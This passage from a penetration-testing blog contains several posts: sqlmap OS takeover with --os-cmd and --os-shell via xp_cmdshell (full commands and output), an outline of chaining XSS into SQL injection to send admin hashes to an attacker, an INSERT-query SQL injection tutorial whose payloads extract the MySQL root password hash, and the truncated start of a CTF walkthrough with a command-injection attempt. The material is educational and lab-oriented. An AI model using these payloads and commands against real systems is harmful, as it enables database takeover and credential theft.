<span style="font-family: "Courier New",Courier,monospace; font-size: x-small;">root@bt:/pentest/database/sqlmap# ./sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S --os-cmd=hostname<br /><br /> sqlmap/1.0-dev (r5068) - automatic SQL injection and database takeover tool<br /> http://www.sqlmap.org<br /><br />[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program<br /><br />[*] starting at 16:32:07<br /><br />[16:32:07] [INFO] parsing HTTP request from 'hackme.txt'<br />[16:32:07] [INFO] using '/pentest/database/sqlmap/output/192.168.1.4/session' as session file<br />[16:32:07] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file<br />[16:32:07] [INFO] testing connection to the target url<br />[16:32:09] [INFO] heuristics detected web page charset 'ascii'<br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: POST<br />Parameter: txtUserName<br /> Type: stacked queries<br /> Title: Microsoft SQL Server/Sybase stacked queries<br /> Payload: __VIEWSTATE=/wEPDwUJMzIyNTUyNzAyZGQX7Zm1/ne8qfz4FyjBx4QNynpGLw==&txtUserName=asd'; WAITFOR DELAY '0:0:5';--&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=/wEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g+MJe/ifr7tT<br />---<br /><br />[16:32:09] [INFO] the back-end DBMS is Microsoft SQL Server<br />web server operating system: Windows XP<br />web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 5.1<br />back-end DBMS: Microsoft SQL Server 2005<br />[16:32:09] [INFO] testing if current user is DBA<br />[16:32:09] [INFO] resumed: 1<br />[16:32:09] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. <br />[16:32:18] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries<br />[16:32:19] [INFO] testing if xp_cmdshell extended procedure is usable<br />[16:32:46] [INFO] adjusting time delay to 2 seconds due to good response times<br />[16:33:19] [INFO] xp_cmdshell extended procedure is usable<br />do you want to retrieve the command standard output? [Y/n/a] Y<br />[16:33:24] [INFO] retrieved: XP_FDCC <br />command standard output: 'XP_FDCC'<br /><br />[16:34:24] [INFO] cleaning up the database management system<br />[16:34:24] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.4'<br /><br />[*] shutting down at 16:34:24<br /><br />root@bt:/pentest/database/sqlmap#</span><br />
<br />
<br />
<b>2. Option: --os-shell</b><br />
<br />
sqlmap provides you a shell where you can run many commands.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace; font-size: x-small;">root@bt:/pentest/database/sqlmap# ./sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S --os-shell<br /><br /> sqlmap/1.0-dev (r5068) - automatic SQL injection and database takeover tool<br /> http://www.sqlmap.org<br /><br />[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program<br /><br />[*] starting at 16:34:33<br /><br />[16:34:33] [INFO] parsing HTTP request from 'hackme.txt'<br />[16:34:33] [INFO] using '/pentest/database/sqlmap/output/192.168.1.4/session' as session file<br />[16:34:33] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file<br />[16:34:33] [INFO] testing connection to the target url<br />[16:34:34] [INFO] heuristics detected web page charset 'ascii'<br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: POST<br />Parameter: txtUserName<br /> Type: stacked queries<br /> Title: Microsoft SQL Server/Sybase stacked queries<br /> Payload: __VIEWSTATE=/wEPDwUJMzIyNTUyNzAyZGQX7Zm1/ne8qfz4FyjBx4QNynpGLw==&txtUserName=asd'; WAITFOR DELAY '0:0:5';--&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=/wEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g+MJe/ifr7tT<br />---<br /><br />[16:34:34] [INFO] the back-end DBMS is Microsoft SQL Server<br />web server operating system: Windows XP<br />web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 5.1<br />back-end DBMS: Microsoft SQL Server 2005<br />[16:34:34] [INFO] testing if current user is DBA<br />[16:34:34] [INFO] resumed: 1<br />[16:34:34] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. <br />[16:34:44] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries<br />[16:34:44] [INFO] testing if xp_cmdshell extended procedure is usable<br />[16:35:11] [INFO] adjusting time delay to 2 seconds due to good response times<br />[16:35:50] [ERROR] invalid character detected. retrying..<br />[16:35:50] [WARNING] increasing time delay to 3 seconds <br />[16:36:10] [INFO] xp_cmdshell extended procedure is usable<br />[16:36:10] [INFO] going to use xp_cmdshell extended procedure for operating system command execution<br />[16:36:10] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER<br />os-shell> hostname<br />do you want to retrieve the command standard output? [Y/n/a] Y<br />[16:40:35] [INFO] retrieved: XP_FDCC <br />command standard output: 'XP_FDCC'<br /><br />os-shell> q<br />[16:43:00] [INFO] cleaning up the database management system<br />[16:43:00] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.4'<br /><br />[*] shutting down at 16:43:00<br /><br />root@bt:/pentest/database/sqlmap#</span><br />
<br />
<b>3. Option: --os-pwn</b><br />
<br />
sqlmap provides various options to connect to database server like Metasploit meterpreter, out-of-band shell and VNC. Again read sqlmap documentation for more information. Following video demonstrates the meterpreter reverse shell technique:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/UoPg2_c2-9s/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/UoPg2_c2-9s?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" />
<param name="bgcolor" value="#FFFFFF" />
<embed width="320" height="266" src="http://www.youtube.com/v/UoPg2_c2-9s?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" type="application/x-shockwave-flash"></embed></object></div>
<br />
This concludes the operating system takeover with sqlmap. In next blogpost, I'll try to takeover a linux host.<br />
<br />
Hope you like this. Let me know your views, comments, suggestions, etc.</div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com34tag:blogger.com,1999:blog-1544325078740292092.post-28690517504993381932012-02-06T11:42:00.000-08:002012-02-14T01:46:04.845-08:00SQL Injection Via XSS<div dir="ltr" style="text-align: left;" trbidi="on"><br />
One of the G4H member <a href="http://www.garage4hackers.com/members/mandi/">mandi</a> from <a href="http://www.garage4hackers.com/">www.garage4hackers.com</a> (my second home) asked few days before about xsssqli attack. He had a scenario where the main site is having a <a href="https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29">cross-site scripting</a> vulnerability and the admin panel has <a href="https://www.owasp.org/index.php/SQL_Injection">SQL Injection</a>. The page having sql injection in admin panel is only accessible to admin. The question was is it possible to use xss on main site to exploit sql injection on admin panel to get admin account pwned? <br />
<br />
Here is my answer with following scenario: <br />
<br />
There is a main site which is vulnerable to xss flaw (reflected/stored). The same site has a admin panel which is only accessible to admin users and one of the authenticated pages is vulnerable to sql injection. the admin panel can be a separate package like cpanel and the sql injection vulnerability will be already published (exploit-db FTW!!!).<br />
<br />
This is how we can pwn admin account using sql injection via xss. <br />
1. Attacker crafts a xss payload which is using AJAX to make a request with sql injection payload. <br />
2. He sends the payload to admin user. <br />
3. When admin user is logged in into admin panel and clicks the payload link from attacker, the sql injection in admin page is exploited and returns the username & password hashes from admin table. <br />
4. Attacker then submit the returned data to his site using Ajax and will crack password hashes offline.<br />
<br />
Video Demonstration:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/2b0VD4_rg8Q/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/2b0VD4_rg8Q?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" /><param name="bgcolor" value="#FFFFFF" /><embed width="320" height="266" src="http://www.youtube.com/v/2b0VD4_rg8Q?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" type="application/x-shockwave-flash"></embed></object></div><br />
<br />
Any suggestions, comments are welcome.<br />
<br />
<b>Update:</b><br />
As rightly pointed by <a href="http://twitter.com/antisnatchor" target="_blank">@antisnatchor</a> on twitter, the issue having xss in main site and sql injeciton in admin panel can be exploited with BeEF Tunneling proxy technique as well. In tunneling proxy, BeEF will use hooked browser (in this case browser used by Admin) as proxy to access the authenticated sessions (in this case the admin panel).<br />
Check <a href="http://www.youtube.com/user/TheBeefproject#p/a/u/1/Z4cHyC3lowk">BeEF Tunneling Proxy in action</a><br />
<br />
</div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com6tag:blogger.com,1999:blog-1544325078740292092.post-56615276807307447362012-02-02T07:51:00.000-08:002012-02-02T07:56:08.178-08:00SQL Injection in INSERT Query<div dir="ltr" style="text-align: left;" trbidi="on">SQL injection is being one of the mostly exploited issues in web application security and has found a place in OWASP Top 10 since 2004. There are many blog posts, papers available on SELECT query injection exploiting WHERE or HAVING clauses. Today I’m going to discuss SQL injection in INSERT query.<br />
<br />
<b>The Basics:</b><br />
<br />
INSERT query followed by VALUES inserts rows into an existing table based on explicitly specified values. The syntax of INSERT query is: (source: <a href="http://dev.mysql.com/doc/refman/5.5/en/insert.html">http://dev.mysql.com/doc/refman/5.5/en/insert.html</a>)<br />
<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">INSERT [LOW_PRIORITY | DELAYED | HIGH_PRIORITY] [IGNORE]</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"> [INTO] tbl_name [(col_name,...)]</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"> {VALUES | VALUE} ({expr | DEFAULT},...),(...),...</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"> [ ON DUPLICATE KEY UPDATE</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"> col_name=expr</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"> [, col_name=expr] ... ]</span><br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">tbl_name</span> is the table into which rows should be inserted. A comma-separated list of column names can be provided following the table name. In this case, a value for each named column must be provided by the <span style="font-family: 'Courier New', Courier, monospace;">VALUES</span> list.<br />
<br />
To insert a record in a table, following query will be used:<br />
<br />
<div style="background-color: #cccccc; font-family: "Courier New",Courier,monospace;">INSERT INTO tbl_name (a,b,c) VALUES(‘data’,’data’,’data’);</div><br />
<div class="MsoNormal" style="text-indent: 0in;"><span style="text-indent: 0in;">I hope this is enough to introduce INSERT query.</span></div><div class="MsoNormal" style="text-indent: 0in;"><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><b><br />
</b><br />
<b>The Injection:</b><br />
<span style="text-indent: 0in;">One of the examples of usage of INSERT query in web application is comment page.</span><br />
<span style="text-indent: 0in;"><br />
</span></div><div class="MsoNormal" style="text-indent: 0in;"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-2-hyzsiOmv8/TyqrzCjcGRI/AAAAAAAAAiI/kprq61RaUig/s1600/sqli-comments.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="299" src="http://3.bp.blogspot.com/-2-hyzsiOmv8/TyqrzCjcGRI/AAAAAAAAAiI/kprq61RaUig/s320/sqli-comments.jpg" width="320" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;">The page requests for name, email address and the comment and inserts this data into database using following query:<br />
<br />
</div><div class="MsoNormal" style="text-indent: 0in;"><span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">INSERT INTO comments (name, email, comment) VALUES (‘lol’,’lol’,’lol’);</span></div><div class="MsoNormal" style="text-indent: 0in;"><br />
In this query, an attacker can inject arbitrary data if the inputs are not sanitized. Let’s check this by placing single quote (‘) in name field.<br />
<br />
</div><div class="MsoNormal" style="text-indent: 0in;"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-vqO_wrVpbvA/TyqsQ7Kxr6I/AAAAAAAAAiQ/YHHAWY8FhA8/s1600/sql.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-vqO_wrVpbvA/TyqsQ7Kxr6I/AAAAAAAAAiQ/YHHAWY8FhA8/s1600/sql.jpg" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;">This results in SQL Error as expected:<br />
<br />
</div><div class="MsoNormal" style="text-indent: 0in;"><span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'asd', 'asd')' at line 1</span></div><div class="MsoNormal" style="text-indent: 0in;"><br />
Now we can inject any data in all fields with comment string at the end. <br />
<br />
</div><div class="MsoNormal" style="text-indent: 0in;"><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-tsO6P7Pb7oU/Tyqsor19GiI/AAAAAAAAAiY/50GBMD2Bv2M/s1600/sqli-comments1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-tsO6P7Pb7oU/Tyqsor19GiI/AAAAAAAAAiY/50GBMD2Bv2M/s1600/sqli-comments1.jpg" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-bxxl_QRPXPo/Tyqst3ai8mI/AAAAAAAAAig/2zbe7m-O6lU/s1600/sqli-comments2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-bxxl_QRPXPo/Tyqst3ai8mI/AAAAAAAAAig/2zbe7m-O6lU/s320/sqli-comments2.jpg" width="306" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><span style="text-indent: 0in;">To get the result of injected query, we need a place where the injected data is reflected back by the application. In this example, the comment details are printed back on the page.</span></div><div class="MsoNormal" style="text-indent: 0in;">So let’s start injecting something which will give information about the database server. We can insert sql subquery in place of parameter value. We will insert subquery ‘(select version())’ without single quotes in ‘email’ parameter.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-qMgSdC_EXBc/Tyqs5Qrs7yI/AAAAAAAAAio/HuHFNUSjPy4/s1600/sqli-comment3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-qMgSdC_EXBc/Tyqs5Qrs7yI/AAAAAAAAAio/HuHFNUSjPy4/s1600/sqli-comment3.jpg" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-OvprAZe_rlI/Tyqs92mEpII/AAAAAAAAAiw/RWtiYrlgMHk/s1600/sqli-comments4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="http://4.bp.blogspot.com/-OvprAZe_rlI/Tyqs92mEpII/AAAAAAAAAiw/RWtiYrlgMHk/s320/sqli-comments4.jpg" width="320" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;">We get the mysql version. In this way we can get the other database details as well like current user, current database, etc. </div><div class="MsoNormal" style="text-indent: 0in;"><br />
Let try to get the password of user ‘root’ from mysql.user table.</div><div class="MsoNormal" style="text-indent: 0in;"><br />
Injected Data:<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; text-indent: 0in;">test’,(select password from mysql.user where user=’root’),’test2’)-- -</span></div><div class="MsoNormal" style="text-indent: 0in;"><br />
This gives error:<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; text-indent: 0in;">Subquery returns more than 1 row</span></div><div class="MsoNormal" style="text-indent: 0in;"><br />
Hmm, only one row. We will use LIMIT to fetch 1 row at a time. Let’s craft the payload with LIMIT:<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; text-indent: 0in;">test’,(select password from mysql.user where user=’root’ limit 0,1),’test2’)-- -</span></div><div class="MsoNormal" style="text-indent: 0in;"><br />
This works and we now have password hash for user ‘root’:</div><div class="MsoNormal" style="text-indent: 0in;"><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-fqL9jqHnUr0/TyqtL-_6zII/AAAAAAAAAi4/5OCWs3B4ZKw/s1600/sqli-comments5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="http://1.bp.blogspot.com/-fqL9jqHnUr0/TyqtL-_6zII/AAAAAAAAAi4/5OCWs3B4ZKw/s400/sqli-comments5.jpg" width="400" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;"></div><div class="MsoNormal" style="text-indent: 0in;"><br />
In this way, we can mine the database with SQL injection in INSERT Query using sql subquery.<br />
<br />
The INSERT query is common in user registration pages. Let’s analyze an example. This example is taken from “<a href="http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10">Mutillidae</a>”, a well-known web application to learn security. A new user provides details such as username, password & signature in order to create an account with the forum/application. This data is then inserted into database using this query. The background SQL query looks like this:</div><div class="MsoNormal" style="text-indent: 0in;"><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">INSERT INTO accounts (username, password, mysignature) VALUES ('data', 'data', 'data');</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"><br />
</span></div><div class="MsoNormal" style="text-indent: 0in;">It’s same as the last example and we will be able to inject arbitrary values into database using single quote (‘) and comment string (-- -):<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-8MLK9e8OCQk/TyqtfoPXxRI/AAAAAAAAAjA/5l7We1zgvA8/s1600/sqli-register.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="194" src="http://2.bp.blogspot.com/-8MLK9e8OCQk/TyqtfoPXxRI/AAAAAAAAAjA/5l7We1zgvA8/s320/sqli-register.JPG" width="320" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><br />
</div><div class="MsoNormal" style="text-indent: 0in;">And the result is:</div><div class="MsoNormal" style="text-indent: 0in;"><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-ry_aItKRysM/TyqtngbQqlI/AAAAAAAAAjI/sRidphFhNso/s1600/sqli-register1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="23" src="http://1.bp.blogspot.com/-ry_aItKRysM/TyqtngbQqlI/AAAAAAAAAjI/sRidphFhNso/s320/sqli-register1.JPG" width="320" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><br />
</div><div class="MsoNormal" style="text-indent: 0in;">Great!! The user is added. Now we can use the same sql subquery technique to inject sql queries and to get the data. But the question is where will be the returned data? <br />
<br />
There are 2 places where the injected data is being reflected by the app.<br />
<br />
One place is “Account created” message as shown in above snapshot. Here ‘username’ value is being reflected. As we cannot control the first single quote (‘) for ‘username’ field, we will not be able to inject subquery which will successfully give us the returned data.<br />
<br />
We need to look for other places to see if our injected data is being reflected back. As we have registered an account, let’s login and check if data from inserted SQL query reflected somewhere or not.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-4goNf93MUCE/Tyqt8L1946I/AAAAAAAAAjQ/QFfDHIEh_44/s1600/sqli-register3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="http://3.bp.blogspot.com/-4goNf93MUCE/Tyqt8L1946I/AAAAAAAAAjQ/QFfDHIEh_44/s400/sqli-register3.JPG" width="400" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><br />
</div><div class="MsoNormal" style="text-indent: 0in;">We can see ‘signature’ parameter is getting reflected in status message. So we need to inject subqueries into ‘signature’ parameter and we will get returned data in status message.<br />
<br />
Let’s start with mysql version(). The payload in username field for this will be:<br />
<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">test’,’test’,(select version()))-- -</span></div><div class="MsoNormal" style="text-indent: 0in;"><br />
And user added successfully.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ATJHwQkYdak/TyquDzgyFMI/AAAAAAAAAjY/tfcBlK1ukiU/s1600/sqli-register4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="21" src="http://2.bp.blogspot.com/-ATJHwQkYdak/TyquDzgyFMI/AAAAAAAAAjY/tfcBlK1ukiU/s320/sqli-register4.JPG" width="320" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><br />
</div><div class="MsoNormal" style="text-indent: 0in;"></div><div class="MsoNormal" style="text-indent: 0in;">Now login with username & password as ‘test’ and check status. It should have mysql version info.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-9ayvuVzz18Y/TyquWL_GZfI/AAAAAAAAAjg/rjoqxfImsp8/s1600/sqli-register5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="82" src="http://1.bp.blogspot.com/-9ayvuVzz18Y/TyquWL_GZfI/AAAAAAAAAjg/rjoqxfImsp8/s320/sqli-register5.JPG" width="320" /></a></div><br />
</div><br />
Yes, it’s there and the injection is successful. Let’s try to get password hash for user ‘root’.<br />
<br />
Payload:<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">test1’,’test1’,(select password from mysql.user where user=’root’))-- -</span><br />
<br />
And here comes the error:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-YWIdWJhnzTs/TyqucSIwLuI/AAAAAAAAAjo/VEOOCqBO9PQ/s1600/sqli-register6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="22" src="http://3.bp.blogspot.com/-YWIdWJhnzTs/TyqucSIwLuI/AAAAAAAAAjo/VEOOCqBO9PQ/s400/sqli-register6.JPG" width="400" /></a></div><br />
<br />
We again need to use LIMIT to get only one row.<br />
<br />
Payload:<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">test1’,’test1’,(select password from mysql.user where user=’root’ LIMIT 0,1))-- -</span><br />
<br />
And we get password hash for user ‘root’.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-D5BWVv-yMqE/TyqujvxyRHI/AAAAAAAAAjw/xffPXXegPFU/s1600/sqli-register7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="20" src="http://2.bp.blogspot.com/-D5BWVv-yMqE/TyqujvxyRHI/AAAAAAAAAjw/xffPXXegPFU/s400/sqli-register7.JPG" width="400" /></a></div><br />
<br />
<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">That’s all. The same way other data can be mined from the database.<br />
<br />
<b>Conclusion:</b><br />
1. Identify the injection point.<br />
2. Check where the injected data is visible.<br />
3. Use subquery to insert sql queries.<br />
4. Use LIMIT to get one row at a time.<br />
<br />
Hope you like this post. Suggestions, queries are welcome.</div><div class="MsoNormal" style="text-indent: 0in;"></div></div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com24tag:blogger.com,1999:blog-1544325078740292092.post-30590383307438425242011-12-19T22:47:00.000-08:002011-12-19T22:47:42.370-08:00ClubHack preCON CTF walkthrough<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://clubhack.com/2011/">ClubHack 2011</a>, India’s Hacker conference, was held on 3-4 Feb 2011 at Pune, India. They had a pre-conference hacking competition, called as WEBWAR, whose winners can win a free entry to the clubhack event. The winners also qualified to play Treasure Hunt, a physical CTF at clubhack conference.<br />
<br />
This post is a walk through for this preCON CTF challenge. After registration for the event, ClubHack provided the link to CTF server. It has a website.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-pat4dHzHnSc/TvAlek63EYI/AAAAAAAAAas/KQ3kgbVadrc/s1600/main-site.JPG" imageanchor="1"><img border="0" height="267" src="http://4.bp.blogspot.com/-pat4dHzHnSc/TvAlek63EYI/AAAAAAAAAas/KQ3kgbVadrc/s400/main-site.JPG" width="400" /></a></div><br />
This was a site having download file and login module. At first, it seems we need to login using Login page where there will be more to come. Also with download page, we can download other files which might help us for other attacks or to login into application.<br />
<br />
Let’s analyze the login module. <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-7Yb4RtVsyvo/TvAlzstp9NI/AAAAAAAAAa4/26_aAGzeM3Y/s1600/login-page.JPG" imageanchor="1"><img border="0" height="162" src="http://2.bp.blogspot.com/-7Yb4RtVsyvo/TvAlzstp9NI/AAAAAAAAAa4/26_aAGzeM3Y/s320/login-page.JPG" width="320" /></a></div><br />
The login page uses MD5 of password string to authenticate. <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-RxkmyHg5c-M/TvAmAn7FF2I/AAAAAAAAAbE/HyUeK73QDRo/s1600/userlogin-js-md5.JPG" imageanchor="1"><img border="0" height="297" src="http://2.bp.blogspot.com/-RxkmyHg5c-M/TvAmAn7FF2I/AAAAAAAAAbE/HyUeK73QDRo/s400/userlogin-js-md5.JPG" width="400" /></a></div><br />
This login seems to not vulnerable to SQL injection & Auth bypass. Only possible attack will be Brute force which again doesn’t prove anything in CTF. So we need valid credentials to log in.<br />
<br />
The other page of interest was download.html.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ODQsOJlbBTM/TvAmM8xEHwI/AAAAAAAAAbQ/TRu6k7aaT8Y/s1600/download-page.JPG" imageanchor="1"><img border="0" height="255" src="http://2.bp.blogspot.com/-ODQsOJlbBTM/TvAmM8xEHwI/AAAAAAAAAbQ/TRu6k7aaT8Y/s400/download-page.JPG" width="400" /></a></div><br />
The download link looks like this:<br />
<div style="background-color: #999999;">http://183.82.241.134/ClubHack/download.php?f=1.bin&oa=cf02eabd1afbca475abeb5760f16f0e2f4dfd929</div><br />
Download page requires 2 parameters: filename & some hash. The hash was identified as SHA1 based on number on characters. After few tests, it was clear that to download any file we need to know filename and SHA1 hash. Filename can be guessed but there was no clue on hash creation for particular file.<br />
<br />
Further inspection on download.html reveals execute.php in source as comment. This seems interesting.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-b566STIg9XA/TvAmaRun0JI/AAAAAAAAAbc/i_KjVuljHCk/s1600/source-of-download-page.JPG" imageanchor="1"><img border="0" height="125" src="http://3.bp.blogspot.com/-b566STIg9XA/TvAmaRun0JI/AAAAAAAAAbc/i_KjVuljHCk/s400/source-of-download-page.JPG" width="400" /></a></div><br />
When accessed, execute.php shows a form which takes 2 parameters: Command & Filename.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-UqsR9agH0gM/TvAmnDOshUI/AAAAAAAAAbo/zjX1dA2Td-U/s1600/execute-page.JPG" imageanchor="1"><img border="0" height="191" src="http://3.bp.blogspot.com/-UqsR9agH0gM/TvAmnDOshUI/AAAAAAAAAbo/zjX1dA2Td-U/s320/execute-page.JPG" width="320" /></a></div><br />
The first thought comes to my mind was Command Injection. When tried with “;ifconfig”, it shows me an error: “Sorry Babu, Test page! Wonly one command is allowed. Try again!”<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-e2Ul3a63LG4/TvAnH1kFloI/AAAAAAAAAb0/nkKoXJ9b-NM/s1600/execute-page-error.JPG" imageanchor="1"><img border="0" height="92" src="http://3.bp.blogspot.com/-e2Ul3a63LG4/TvAnH1kFloI/AAAAAAAAAb0/nkKoXJ9b-NM/s400/execute-page-error.JPG" width="400" /></a></div><br />
After several attempts, it was clear that this page not vulnerable to any injection. It seems to work with only one command as said in error message. The I looked for all Linux commands which take filename as parameter. Commands like cat, less, more, tail, etc,etc falls under such category. <br />
<br />
None of these seems working. At the end, there were checksum commands left. The command “sha1sum” seems working with valid filename.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-W8iTpSa_Z04/TvAnWAzJiGI/AAAAAAAAAcA/348Fsz1dLGo/s1600/execute-page-exe1.JPG" imageanchor="1"><img border="0" height="207" src="http://4.bp.blogspot.com/-W8iTpSa_Z04/TvAnWAzJiGI/AAAAAAAAAcA/348Fsz1dLGo/s400/execute-page-exe1.JPG" width="400" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-6Y0J0mxYlR0/TvAndPzWXEI/AAAAAAAAAcM/uZFvGkJCc8k/s1600/execute-page-exe2.JPG" imageanchor="1"><img border="0" height="168" src="http://1.bp.blogspot.com/-6Y0J0mxYlR0/TvAndPzWXEI/AAAAAAAAAcM/uZFvGkJCc8k/s400/execute-page-exe2.JPG" width="400" /></a></div><br />
